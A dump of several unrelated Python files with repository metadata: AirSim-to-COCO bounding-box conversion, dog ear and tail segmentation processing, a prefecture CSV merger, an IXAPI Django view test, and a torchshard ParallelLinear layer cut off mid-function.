matrix[2, 1] = -c_p * s_r
matrix[2, 2] = c_p * c_r
return matrix
def _get_vehicle_coord(anno_data):
translation = anno_data["translation"]
size = anno_data["size"]
a = size[0]
size[0] = size[1]
size[1] = a
rotation = anno_data["rotation"]
# cords the bounding box of a vehicle
cords = np.zeros((8, 4))
cords[0, :] = np.array([size[0] / 2, size[1] / 2, -size[2] / 2, 1])
cords[1, :] = np.array([-size[0] / 2, size[1] / 2, -size[2] / 2, 1])
cords[2, :] = np.array([-size[0] / 2, -size[1] / 2, -size[2] / 2, 1])
cords[3, :] = np.array([size[0] / 2, -size[1] / 2, -size[2] / 2, 1])
cords[4, :] = np.array([size[0] / 2, size[1] / 2, size[2] / 2, 1])
cords[5, :] = np.array([-size[0] / 2, size[1] / 2, size[2] / 2, 1])
cords[6, :] = np.array([-size[0] / 2, -size[1] / 2, size[2] / 2, 1])
cords[7, :] = np.array([size[0] / 2, -size[1] / 2, size[2] / 2, 1])
vehicle_world_matrix = _get_rotation_matrix(translation, rotation)
world_cords = np.dot(vehicle_world_matrix, np.transpose(cords))
return np.array(world_cords)
def get_2d_bounding_box(cords):
x_min = cords[0, 0]
x_max = cords[0, 0]
y_min = cords[1, 0]
y_max = cords[1, 0]
for i in range(1, 8):
if cords[0, i] < x_min:
x_min = cords[0, i]
if cords[0, i] > x_max:
x_max = cords[0, i]
if cords[1, i] < y_min:
y_min = cords[1, i]
if cords[1, i] > y_max:
y_max = cords[1, i]
return x_min, y_min, x_max - x_min, y_max - y_min
def convert_coco():
# data_dir = 'C:/Users/35387/Desktop/airsim_camera_demo'
data_dir = '/DB/rhome/shaohengfang/datasets/airsim/airsim_camera_10scene'
DEBUG = False
nusc = NuScenes(version='v1.0-mini', dataroot=data_dir, verbose=True)
cats = ['car', 'car_overlook']
splits = ['train', 'val']
scene_split = {'train': train_split, 'val': val_split}
cat_ids = {cat: i + 1 for i, cat in enumerate(cats)}
F = 400 # focal
H = 450 # height
W = 800 # width
camera_intrinsic = [[400.0, 0.0, 400.0],
[0.0, 400.0, 225.0],
[0.0, 0.0, 1.0]]
cat_info = []
for i, cat in enumerate(cats):
cat_info.append({'supercategory': 'vehicle', 'name': cat, 'id': i + 1})
image_id = 0
bbox_id = 0
for split in splits:
ret = {'images': [], "type": "instances", 'annotations': [], 'categories': cat_info}
for scene in nusc.scene:
if not scene["name"] in scene_split[split]:
continue
scene_token = scene['token']
cur_sample_token = scene['first_sample_token']
while cur_sample_token != "":
print(cur_sample_token)
cur_sample = nusc.get("sample", cur_sample_token)
# =======================
# execute the current sample data
anno_tokens = cur_sample["anns"]
# get the vehicle coords in global frame
vehicle_cords = []
for anno_token in anno_tokens:
anno_data = nusc.get("sample_annotation", anno_token)
vehicle_cords.append(_get_vehicle_coord(anno_data))
sample_data = cur_sample["data"]
sensors = list(sample_data.keys())
for sensor in sensors:
# image info
sensor_record = nusc.get("sample_data", sample_data[sensor])
image_id += 1
image_info = {'file_name': sensor_record['filename'],
'id': image_id,
'height': 450,
'width': 900}
ret['images'].append(image_info)
# anno info
calibrated_record = nusc.get("calibrated_sensor", sensor_record["calibrated_sensor_token"])
im_position = calibrated_record["translation"]
im_position[2] = -im_position[2]
im_rotation = calibrated_record["rotation"]
im_rotation[3] = -im_rotation[3]
im_rotation = Quaternion(im_rotation)
cat_id = 1
if sensor[:10] == "CAM_BOTTOM":
cat_id = 2
for vehicle_cord in vehicle_cords:
flag = True
# get bbox from vehicle_cord
vehicle_cord_ = np.array(vehicle_cord)
vehicle_cord_ = vehicle_cord_[:3, :]
for j in range(3):
vehicle_cord_[j, :] = vehicle_cord_[j, :] - im_position[j]
vehicle_cord_[:3, :] = np.dot(im_rotation.rotation_matrix, vehicle_cord_[:3, :])
vehicle_cord_[:3, :] = np.dot(Quaternion([0.5, -0.5, 0.5, -0.5]).rotation_matrix.T,
vehicle_cord_[:3, :])
depths = vehicle_cord_[2, :]
for j in range(8):
if depths[j] < 0:
flag = False
if not flag:
continue
vehicle_points = view_points(vehicle_cord_[:3, :], np.array(camera_intrinsic), normalize=True)
x, y, w, h = get_2d_bounding_box(vehicle_points)
if x < 0 or y < 0 or (x + w) > 800 or (y + h) > 450:
flag = False
if not flag:
continue
bbox_id += 1
ann = {'area': w * h,
'iscrowd': 0,
'image_id': image_id,
'bbox': [800 - x - w, y, w, h],
'category_id': cat_id,
'id': bbox_id,
'ignore': 0,
'segmentation': []}
ret['annotations'].append(ann)
# =======================
cur_sample_token = cur_sample['next']
print("# images: ", len(ret['images']))
print("# annotations: ", len(ret['annotations']))
# out_path = 'C:/Users/35387/Desktop/airsim_camera_demo/airsim_instances_{}.json'.format(split)
out_path = '/DB/rhome/shaohengfang/model/CenterNet/data/airsim_camera/annotations/{}_instances.json'.format(split)
json.dump(ret, open(out_path, 'w'))
if __name__ == '__main__':
convert_coco()
| 42.822785 | 122 | 0.515913 | 1,354 | 10,149 | 3.600443 | 0.231167 | 0.01641 | 0.018051 | 0.019692 | 0.157538 | 0.099487 | 0.070359 | 0.05641 | 0.05641 | 0.049846 | 0 | 0.076296 | 0.33491 | 10,149 | 236 | 123 | 43.004237 | 0.645926 | 0.03961 | 0 | 0.035533 | 0 | 0 | 0.158241 | 0.017468 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025381 | false | 0 | 0.081218 | 0 | 0.126904 | 0.020305 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9a821cc281b228396f8b843b5b439e1cb8ce61 | 14,355 | py | Python | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | 1 | 2020-10-04T18:40:23.000Z | 2020-10-04T18:40:23.000Z | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | null | null | null | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | null | null | null | """Scripts for second stage of labelling - ear and tail segmentations"""
from vis.utils import *
from dataset_production.mturk_processor import *
from scipy.ndimage import center_of_mass as COM
from matplotlib import colors
def extract_colours(rgb_array):
"""Given an array of (r,g,b) values, returns list of unique colours"""
return np.unique(rgb_array.reshape(-1, rgb_array.shape[2]), axis=0)
def hex_to_rgb(hex):
return np.array([int(hex[i:i + 2], 16) for i in (0, 2, 4)])
def hex_to_unit_rgb(hex):
out = np.array([int(hex[i:i + 2], 16) for i in (0, 2, 4)])
if out.max() > 1:
out = out / 255 # convert to r, g, b values between 0 and 1
return out
def rgb_to_bin(rgb, t=0.1):
"""Make rgb into binary mask array"""
gs = np.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])
return gs > (gs.max() * t)
def extract_segmentations(images_dir, segment_loc, plot_entries=False, plot_rejects=False, plot_seg=False,
plot_vis=False,
reject_by_entry=True, reject_by_correlation=True, **kwargs):
"""Given a results csv of images and their marked silhouettes, collect and average all of them.
Produce output JSON in correct order, with numpy arrays of """
data = {} # data to be dict of img_src: [labelled_keypoints]
data_by_row = {} # dict of n_row : (img, segment_uri)
out_dir = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments"
src_keypoints = joinp(out_dir, "keypoints_base.json")
input_data = json.load(open(src_keypoints, "r")) # load existing data
tt = np.load(joinp(out_dir, "splits_base.npz"))
train, val = list(tt["train_list"]), list(tt["val_list"])
# Create sub directories if necessary
try_mkdir(out_dir)
results_loc = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\results_ear_tail.csv"
with open(results_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for n_row, line in enumerate(reader):
*_, img, height, width, segment_uri, status = get_columns(headers, line, "img",
"img_height",
"img_width", "segment", "status")
if n_row == 0:
# define dicitonary of name : colour
seg_names = ["Left ear tip", "Right ear tip", "Left ear", "Right ear", "Tail"]
colour_assignments = get_columns(headers, line, *seg_names)
if status != "Rejected":
data[img] = data.get(img, []) + [(n_row, segment_uri)] # add to dictionary, store row of operation
data_by_row[n_row] = (img, segment_uri)
p = tqdm.tqdm(total=len(input_data))
n_succ, n_errors = 0, 0
n_ear_tips_labelled = 0
for index, entry in enumerate(input_data):
no_error = True
img_src = entry["img_path"]
W, H = entry["img_width"], entry["img_height"]
keypoints = entry["joints"]
img_data = plt.imread(os.path.join(images_dir, img_src), format="jpg")
H, W, _ = img_data.shape
if img_src not in data:
no_error = False
elif len([i for i in keypoints if i != [0, 0, 0]]) < 5:
no_error = False
else:
segments = data[img_src]
segment_data = {}
for n, (n_row, segment_uri) in enumerate(segments):
segment_rgb = (read_uri(segment_uri)[:, :, :3] * 255).astype(np.int16) # get as rgb
# separate by colour
# colours = extract_colours(segment_rgb)
for i, hex_col in enumerate(colour_assignments):
name = seg_names[i]
colour = hex_to_rgb(hex_col[1:])
indices_list = np.any(segment_rgb == colour, axis=-1) # extract only this colour
this_channel = np.zeros((H, W))
this_channel[indices_list] = True
segment_data[name] = segment_data.get(name, []) + [this_channel]
# Average across segments to produce binary mask
for seg_name in segment_data:
segment_data[seg_name] = np.mean(segment_data[seg_name], axis=0) > 0.5
# add ears to keypoint
r_ear = COM(segment_data["Right ear tip"])[::-1]
l_ear = COM(segment_data["Left ear tip"])[::-1]
ear_tips = False
for ear in (r_ear, l_ear):
if any(np.isnan(i) for i in ear):
entry["joints"].append([0, 0, 0])
else:
entry["joints"].append([*ear, 1])
ear_tips = True
entry["ear_tips_labelled"] = ear_tips
n_ear_tips_labelled += ear_tips
main_segment = plt.imread(joinp(images_dir, "segments", "segs", img_src)) # segmentation of main body
# OUTPUT ARRAY with 0 for nothing, 1 for main dog, 2 for left ear, 3 for right ear, 4 for tail
segment_out = np.zeros((H, W))
segment_out[rgb_to_bin(main_segment, t=0.5)] = 1
segment_out[segment_data["Left ear"]] = 2
segment_out[segment_data["Right ear"]] = 3
segment_out[segment_data["Tail"]] = 4
folder = img_src.split("/")[0]
try_mkdir(joinp(out_dir, "segs", folder))
np.save(joinp(out_dir, "segs", img_src.replace("jpg", "npy")), segment_out.astype(np.int16))
if no_error:
n_succ += 1
else:
if index in train: train.remove(index)
if index in val: val.remove(index)
n_errors += 1
if len(entry["joints"]) < 20:
entry["joints"] += [[0, 0, 0]] * (len(entry["joints"]) - 20)
p.update()
p.set_description(f"Success: {n_succ}, Errors: {n_errors}, n_ET = {n_ear_tips_labelled}")
with open(joinp(out_dir, "keypoints_filtered.json"), "w") as outfile:
json.dump(input_data, outfile)
np.save(joinp(out_dir, "train.npy"), train)
np.save(joinp(out_dir, "val.npy"), val)
def get_variation_by_keypoint(images_dir, keypoints_loc, keypoint_list, **kwargs):
"""Produce a dictionary of size (N_keypoints, X, 2) which gives the deviations of each keypoint in each frame
from the mean."""
output_data = {} #
filtered_json_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments\keypoints_filtered.json"
filtered_json = {i["img_path"]: i for i in json.load(open(filtered_json_src))}
data = {} # data to be dict of img_src: [labelled_keypoints]
segment_worker_data = {} # data to be dict of img_src: segment data
img_sizes = {} # data to be dict of img_src: (width, height)
# load normal keypoints
with open(keypoints_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for line in reader:
*_, img, is_multiple_dogs, height, width, answers, status = get_columns(headers, line, "img",
"multiple_dogs", "img_height",
"img_width", "answer", "status")
# answers originally an array of dicts, where each dict has keys label, x and y
# convert to a single dict, with format label: (x,y)
answers = eval(answers)
if status != "Rejected":
answer_dict = {i["label"]: (i["x"], i["y"]) for i in answers}
data[img] = data.get(img, []) + [answer_dict] # add to dictionary
img_sizes[img] = (int(width), int(height))
# load ear tail keypoints
results_loc = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\results_ear_tail.csv"
with open(results_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for n_row, line in enumerate(reader):
*_, img, height, width, segment_uri, status = get_columns(headers, line, "img",
"img_height",
"img_width", "segment", "status")
if n_row == 0:
# define dicitonary of name : colour
seg_names = ["Left ear tip", "Right ear tip", "Left ear", "Right ear", "Tail"]
colour_assignments = get_columns(headers, line, *seg_names)
if status != "Rejected":
segment_worker_data[img] = segment_worker_data.get(img, []) + [
(n_row, segment_uri)] # add to dictionary, store row of operation
# For now, load all data from any assignments, and just average any data to form the basis for the actual plot.
# Scheme to dismiss points:
# If labelled in only 1 dataset, dismiss
# If labelled in only 2 datasets, if rms error > threshold, dismiss
# If labelled in 3 datasets, if rms error > threshold, dismiss
# If in any case, not dismissed, final position is the average of any datasets
progress_bar = tqdm.tqdm(total=len(data))
# Declare figures outside of loop, to minimise memory wastage of creating thousands of figures
for img, answers in list(data.items()):
if img not in filtered_json:
progress_bar.update()
continue # skip any not in final json
entry = filtered_json[img]
# Set thresholds for deciding if data set is valid
width, height = entry["img_width"], entry["img_height"]
threshold = (width + height) / 80
image_keypoint_data = dict(img_path=img, img_width=width, img_height=height,
joints=[]) # place data here for .json output
joint_data = {} # dict of joint : (mean_x, mean_y, visibility) for all keypoints
for i, keypoint_label in enumerate(keypoint_list):
colour = colours[keypoint_label] # get colour (ignoring hidden command)
if any(keypoint_label + " (hidden)" in answer for answer in answers):
keypoint_label = keypoint_label + " (hidden)" # change keypoint name to reflect this
if [answer.get(keypoint_label) for answer in answers if keypoint_label in answer] == []:
continue
all_xs, all_ys = zip(
*[answer.get(keypoint_label) for answer in answers if keypoint_label in answer]) # Get all non blank xs
mean_x, mean_y = mean(all_xs), mean(all_ys)
n_valid = len(all_xs)
discard = False
if n_valid == 1:
# For now, if fewer than 3 submitted, accept 1x n_valid. Change this later when dataset is finished
discard = len(answers) >= 3
while n_valid > 2:
if rms(all_xs, all_ys) > threshold:
# Discard worst point and try as 2 data points
n_dis = most_anomalous(all_xs, all_ys)
all_xs, all_ys = all_xs[:n_dis] + all_xs[n_dis + 1:], all_ys[:n_dis] + all_ys[n_dis + 1:]
mean_x, mean_y = mean(all_xs), mean(all_ys)
n_valid -= 1
else:
break
for n, (x, y) in enumerate(zip(all_xs, all_ys)):
if x != 0 and y != 0:
output_data[i] = output_data.get(i, []) + [(x - mean_x, y - mean_y)]
# Get ear tips data
if img not in segment_worker_data:
progress_bar.update()
continue
segments = segment_worker_data[img]
segment_data = {}
for n, (n_row, segment_uri) in enumerate(segments):
segment_rgb = (read_uri(segment_uri)[:, :, :3] * 255).astype(np.int16) # get as rgb
## separate by colour
# colours = extract_colours(segment_rgb)
for i, hex_col in enumerate(colour_assignments):
name = seg_names[i]
colour = hex_to_rgb(hex_col[1:])
indices_list = np.any(segment_rgb == colour, axis=-1) # extract only this colour
this_channel = np.zeros((height, width))
this_channel[indices_list] = True
segment_data[name] = segment_data.get(name, []) + [this_channel]
r_ears = [COM(i) for i in segment_data["Right ear tip"]]
l_ears = [COM(i) for i in segment_data["Left ear tip"]]
# Average across segments to produce binary mask
segment_data_mean = {}
for seg_name in segment_data:
segment_data_mean[seg_name] = np.mean(segment_data[seg_name], axis=0) > 0.5
# add ears to keypoint
r_ear_mean = COM(segment_data_mean["Right ear tip"])
l_ear_mean = COM(segment_data_mean["Left ear tip"])
if entry["ear_tips_labelled"]:
for ear_idx in [0, 1]:
mean_y, mean_x = [r_ear_mean, l_ear_mean][ear_idx]
ear_tip = [r_ears, l_ears][ear_idx]
for (y, x) in ear_tip:
if not np.isnan(x) and not np.isnan(y):
idx = 18 + ear_idx
output_data[idx] = output_data.get(idx, []) + [(x - mean_x, y - mean_y)]
progress_bar.update()
with open(r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\variation_by_keypoint.json",
"w") as outfile:
json.dump(output_data, outfile)
def plot_keypoint_heatmaps():
"""Produce plot of variation for each keypoint on to an annotated dog image"""
data_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\variation_by_keypoint.json"
data = json.load(open(data_src, "r"))
img_dir = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset" # select another
img_src = r"n02091244-Ibizan_hound/n02091244_3373.jpg"
img = plt.imread(joinp(img_dir, img_src))
# Load keypoints
keypoint_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments\keypoints_filtered.json"
# # USE THIS CODE BLOCK TO FIND IMAGES WITH A GOOD NUMBER OF KEYPOINTS LABELLED
# for i in json.load(open(keypoint_src)):
# keypoints = i["joints"]
# n_k = len([x for x in keypoints if x != [0.0, 0.0, 0.0]])
# if n_k == 20:
# plt.imshow(plt.imread(joinp(img_dir, i["img_path"])))
# plt.title(i["img_path"])
# print(i["img_path"])
# plt.show()
img_entry = [i for i in json.load(open(keypoint_src)) if i["img_path"] == img_src][0]
keypoint_data = img_entry["joints"]
X, Y, V = [list(i) for i in zip(*keypoint_data)]
H, W = img_entry["img_height"], img_entry["img_width"]
dpi = 300
fig, ax = plt.subplots(figsize=(W / dpi, H / dpi))
ax.imshow(img)
pix_width = 20.5 # search range for bins
for n in range(20):
d = data[str(n)]
d = [(x, y) for (x, y) in d if not np.isnan(x) and not np.isnan(y)]
if n >= 18: # switch x and y for n >= 18 due to error in ear tips
X[n], Y[n] = Y[n], X[n]
if X[n] != 0:
x_hist, y_hist = zip(*d)
# normalise to center of actual keypoint
x_norm = [x + X[n] for x in x_hist]
y_norm = [y + Y[n] for y in y_hist]
# for bins, only consider spread within range (-10, 10) from center
bin_x_range = np.arange(X[n] - pix_width, X[n] + pix_width, 1.0)
bin_y_range = np.arange(Y[n] - pix_width, Y[n] + pix_width, 1.0)
colour = hex_to_unit_rgb(colours[dog_dataset["keypoint_list"][n]][1:]) # get colour in (r,g,b) format
colour_ramp = [[*colour, i] for i in np.arange(0, 1, 0.01)] # from full alpha to full colour
cmap = colors.LinearSegmentedColormap.from_list('my_colormap', colour_ramp)
h, *_ = np.histogram2d(x_norm, y_norm)
vmax = sorted(h.flatten())[-5] # will be distorted by maximum 4 verts, so look below that
ax.hist2d(x_norm, y_norm, bins=[bin_x_range, bin_y_range], cmap=cmap, vmax=vmax)
ax.set_xlim(0, W)
ax.set_ylim(0, H)
ax.invert_yaxis()
ax.axis("off")
plt.subplots_adjust(left=0, bottom=0, right=1, top=1)
plt.savefig(
r"C:\Users\Ollie\Dropbox\Ollie\University\IIB\Project\Figures\image_processing\dataset_statistics\heatmap.png",
dpi=dpi)
if __name__ == "__main__":
extract_segmentations(**dog_dataset)
# get_variation_by_keypoint(**dog_dataset)
# plot_keypoint_heatmaps()
| 34.927007 | 126 | 0.676419 | 2,354 | 14,355 | 3.935854 | 0.171198 | 0.027307 | 0.007771 | 0.010362 | 0.387588 | 0.351754 | 0.328009 | 0.307285 | 0.285699 | 0.285699 | 0 | 0.016043 | 0.192337 | 14,355 | 410 | 127 | 35.012195 | 0.783077 | 0.228352 | 0 | 0.256098 | 0 | 0.012195 | 0.142792 | 0.040004 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028455 | false | 0 | 0.01626 | 0.004065 | 0.060976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9ab6d958bddc118fb34cac20ce0e74d1c7b8ce | 664 | py | Python | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | dl_jp_geojson/data/makecsv.py | mski-iksm/dl_jp_geojson | 64edaa3f6200994c4d8fb61b52ecc0bae9da6842 | [
"MIT"
] | null | null | null | import pandas as pd
savename = "prefecture_city.csv"
savedf = False
for num in range(1, 48):
strnum = '{0:02d}'.format(num)
filename = "prefecture{}.txt".format(strnum)
df = pd.read_csv(filename, sep='|', skiprows=[1])
df.columns = ["nan0", 'prefecture_name', 'prefecture_code',
'city_name', 'city_code', 'gj', 'tj', 'nan7']
df = df.astype(str)
for col in df.columns[1:-1]:
df[col] = df[col].str.strip()
df = df.iloc[:, 1:5]
if savedf is False:
savedf = df
else:
savedf = pd.concat([savedf, df])
savedf = savedf.reset_index(drop=True)
savedf.to_csv(savename)
| 27.666667 | 64 | 0.575301 | 92 | 664 | 4.065217 | 0.521739 | 0.016043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026369 | 0.25753 | 664 | 23 | 65 | 28.869565 | 0.732252 | 0 | 0 | 0 | 0 | 0 | 0.160686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9b7594766494a397545f4d3091de4ab4059dcb | 2,396 | py | Python | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | null | null | null | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | 1 | 2021-11-11T22:08:22.000Z | 2021-11-11T22:08:22.000Z | extras/tests/test_views.py | 2bithacker/peering-manager | 5953c4b1f2cff2a370b68d418a98c5c9e3037de8 | [
"Apache-2.0"
] | null | null | null | from unittest.mock import patch
from funcy.funcs import identity
from extras.models import IXAPI
from utils.testing import ViewTestCases
class IXAPITestCase(ViewTestCases.PrimaryObjectViewTestCase):
model = IXAPI
test_bulk_edit_objects = None
@classmethod
def setUpTestData(cls):
IXAPI.objects.bulk_create(
[
IXAPI(
name="IXP 1",
url="https://ixp1-ixapi.example.net/v1/",
api_key="key-ixp1",
api_secret="secret-ixp1",
identity="1234",
),
IXAPI(
name="IXP 2",
url="https://ixp2-ixapi.example.net/v2/",
api_key="key-ixp2",
api_secret="secret-ixp2",
identity="1234",
),
IXAPI(
name="IXP 3",
url="https://ixp3-ixapi.example.net/v3/",
api_key="key-ixp3",
api_secret="secret-ixp3",
identity="1234",
),
]
)
cls.form_data = {
"name": "IXP 4",
"url": "https://ixp4-ixapi.example.net/v1/",
"api_key": "key-ixp4",
"api_secret": "secret-ixp4",
"identity": "1234",
}
def test_get_object_anonymous(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_get_object_anonymous()
def test_get_object_with_permission(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_get_object_with_permission()
def test_edit_object_with_permission(self):
with patch(
"extras.models.ix_api.IXAPI.get_customers",
return_value=[
{"id": "1234", "name": "Customer 1"},
{"id": "5678", "name": "Customer 2"},
],
):
super().test_edit_object_with_permission()
| 30.329114 | 61 | 0.466611 | 225 | 2,396 | 4.773333 | 0.288889 | 0.067039 | 0.055866 | 0.053073 | 0.489758 | 0.395717 | 0.395717 | 0.3473 | 0.3473 | 0.3473 | 0 | 0.046122 | 0.402755 | 2,396 | 78 | 62 | 30.717949 | 0.704403 | 0 | 0 | 0.441176 | 0 | 0 | 0.217028 | 0.050083 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.161765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9bed51d7ce9e6e6a8e36ed3a6d340243c9131e | 7,399 | py | Python | torchshard/nn/modules/linear.py | KaiyuYue/torchshard | 89e21def180bf6063ceb2e312a61631173abc7e7 | [
"Apache-2.0"
] | 265 | 2021-04-27T12:06:45.000Z | 2022-03-17T11:13:17.000Z | torchshard/nn/modules/linear.py | poodarchu/torchshard | 667cfce9ed3e2170c7768d910a71aa07897857e7 | [
"Apache-2.0"
] | 7 | 2021-05-24T06:54:44.000Z | 2022-01-01T18:47:38.000Z | torchshard/nn/modules/linear.py | KaiyuYue/torchshard | 89e21def180bf6063ceb2e312a61631173abc7e7 | [
"Apache-2.0"
] | 11 | 2021-04-28T04:15:44.000Z | 2022-01-26T04:29:30.000Z | import warnings
import math
from typing import Optional, TypeVar
import torch
import torch.nn as nn
from torch import Tensor
from torch.nn import Module
from torch.nn import init
from torch.nn.parameter import Parameter
import torchshard
from .. import functional as F
from ...distributed import get_world_size, get_group, get_rank
from ...distributed import scatter, gather
from ...__init__ import set_attribute, _PARALLEL_DIM
from ...__init__ import TORCH_VERSION
# See https://mypy.readthedocs.io/en/latest/generics.html#generic-methods-and-generic-self for the use
# of `T` to annotate `self`. Many methods of `Module` return `self` and we want those return values to be
# the type of the subclass, not the looser type of `Module`.
T = TypeVar('T', bound='Module')
class RegisterParallelDim(Module):
"""
Helper class to register parallel dimension attribute to tensors.
Args:
dim (int): which dimension along to parallelize the tensor.
Returns:
x (Tensor): same as input tensor.
"""
__constants__ = ['dim']
dim: Optional[int]
def __init__(self, dim: Optional[int] = None) -> None:
super(RegisterParallelDim, self).__init__()
self.dim = dim
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, 'dim'):
self.dim = None
def forward(self, x):
if isinstance(x, list) or isinstance(x, tuple):
for _x in x:
set_attribute(_x, self.dim)
elif isinstance(x, Tensor):
set_attribute(x, self.dim)
else:
raise ValueError
return x
def extra_repr(self):
return 'dim={}'.format(self.dim)
class ParallelLinear(Module):
"""
Parallel version of :class::`torch.nn.Linear`.
Arguments are similar to :class:`torch.nn.Linear`. Extra arguments:
Args:
dim (int): which dimension along to parallelize layers.
Returns:
:class::`torch.Tensor`.
"""
__constants__ = ['in_features', 'out_features', 'dim']
in_features: int
out_features: int
weight: Tensor
dim: Optional[int]
def __init__(self, in_features: int, out_features: int, bias: bool = True, dim: Optional[int] = None) -> None:
super(ParallelLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.dim = dim
self.weight = torch.empty((self.out_features, self.in_features))
if bias:
self.bias = torch.empty((self.out_features))
else:
self.bias = self.register_parameter('bias', None)
self.reset_params()
self.slice_params()
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, 'dim'):
self.dim = None
def reset_params(self) -> None:
init.kaiming_uniform_(self.weight, a=math.sqrt(5))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def slice_params(self) -> None:
# scatter weight and bias
if self.dim == -1 or self.dim == 1:
self.weight = scatter(self.weight, dim=0)
if self.bias is not None:
self.bias = scatter(self.bias, dim=0)
if self.dim == 0:
self.weight = scatter(self.weight, dim=1)
# wrap into Parameter
self.weight = Parameter(self.weight)
if self.bias is not None:
self.bias = Parameter(self.bias)
# set parallel attr
self._set_parameter_attr([self.weight, self.bias], self.dim)
def forward(self, input: Tensor) -> Tensor:
return F.parallel_linear(input, self.weight, self.bias, self.dim)
def extra_repr(self):
return 'in_features={}, out_features={}, bias={}, dim={}'.format(
self.in_features, self.out_features, self.bias is not None, self.dim
)
@classmethod
def _set_parameter_attr(cls, tensors, dim=None):
if not isinstance(tensors, list):
tensors = [tensors]
for t in tensors:
if t is None:
continue
set_attribute(t, dim)
if isinstance(t, torch.nn.Parameter):
# NOTE: Both setattr and __setattr__ doesn't work.
set_attribute(t.data, dim)
@classmethod
def convert_parallel_linear(cls, module, dim=None):
"""
Helper function to convert all :class::`torch.nn.Linear` layers in the model to
:class::`torch.nn.ParallelLinear` layers.
"""
if not dim in [None, 1, -1, 0]:
raise ValueError(f"")
module_output = module
_ddp_params_and_buffers_to_ignore = []
if isinstance(module, torch.nn.Linear):
module_output = torchshard.nn.ParallelLinear(
module.in_features,
module.out_features,
bias=(module.bias is not None),
dim=dim
)
with torch.no_grad():
if dim is None:
module_output.weight = module.weight
if module.bias is not None:
module_output.bias = module.bias
else:
if dim == -1 or dim == 1:
module_output.weight = Parameter(scatter(module.weight, dim=0))
if module.bias is not None:
module_output.bias = Parameter(scatter(module.bias, dim=0))
else:
module_output.weight = Parameter(scatter(module.weight, dim=1))
if module.bias is not None:
module_output.bias = module.bias
# Above assignments will brush off the _PARALLEL_DIM. So we set it again.
cls._set_parameter_attr(
[module_output.weight, module_output.bias], dim)
if hasattr(module, "qconfig"):
module_output.qconfig = module.qconfig
for name, child in module.named_children():
module_output.add_module(name, cls.convert_parallel_linear(child, dim))
# make DDP ignore parallel linear's weight and bias parameters
module_output_child = getattr(module_output, name)
if isinstance(module_output_child, torchshard.nn.ParallelLinear):
if hasattr(module_output_child.weight, _PARALLEL_DIM):
